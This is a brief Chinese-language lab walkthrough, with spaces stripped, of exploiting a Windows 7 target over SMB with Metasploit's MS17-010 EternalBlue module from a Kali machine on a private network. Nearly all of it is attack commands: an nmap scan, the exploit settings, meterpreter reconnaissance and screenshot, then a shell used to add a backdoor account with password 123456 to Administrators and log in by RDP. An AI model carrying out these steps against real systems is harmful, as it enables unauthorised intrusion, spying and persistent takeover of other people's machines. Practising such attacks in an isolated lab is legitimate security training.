目录1.启动msf2.检查msf库里是否存在ms17-010漏洞3.扫描靶机开放端口4.配置目标ip，本地ip并利用exploit进行攻击5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图6.获得shell控制台进cmd操作，添加账户提升权限7.远程登录靶机8.输入添加的账户密码，登录成功

环境：

攻击机：kali192.168.10.2靶机：win7192.168.10.31.启动msf#msfconsole2.检查msf库里是否存在ms17-010漏洞msf6>searchms173.扫描靶机开放端口#nmap-sV192.168.10.34.配置目标ip，本地ip并利用exploit进行攻击msf6>useexploit/windows/smb/ms17_010_eternalbluemsf6exploit(windows/smb/ms17_010_eternalblue)>setrhost192.168.10.3msf6exploit(windows/smb/ms17_010_eternalblue)>setlhost192.168.10.2msf6exploit(windows/smb/ms17_010_eternalblue)>exploit5.查看靶机系统信息、用户身份并对远程主机当前屏幕截图meterpreter>sysinfometerpreter>getuidmeterpreter>screenshot6.获得shell控制台进cmd操作，添加账户提升权限meterpreter>shellC:\Windows\system32>netuserlql123456/addC:\Windows\system32>netlocalgroupAdministratorslql/add7.远程登录靶机#rdesktop192.168.10.3:33898.输入添加的账户密码，登录成功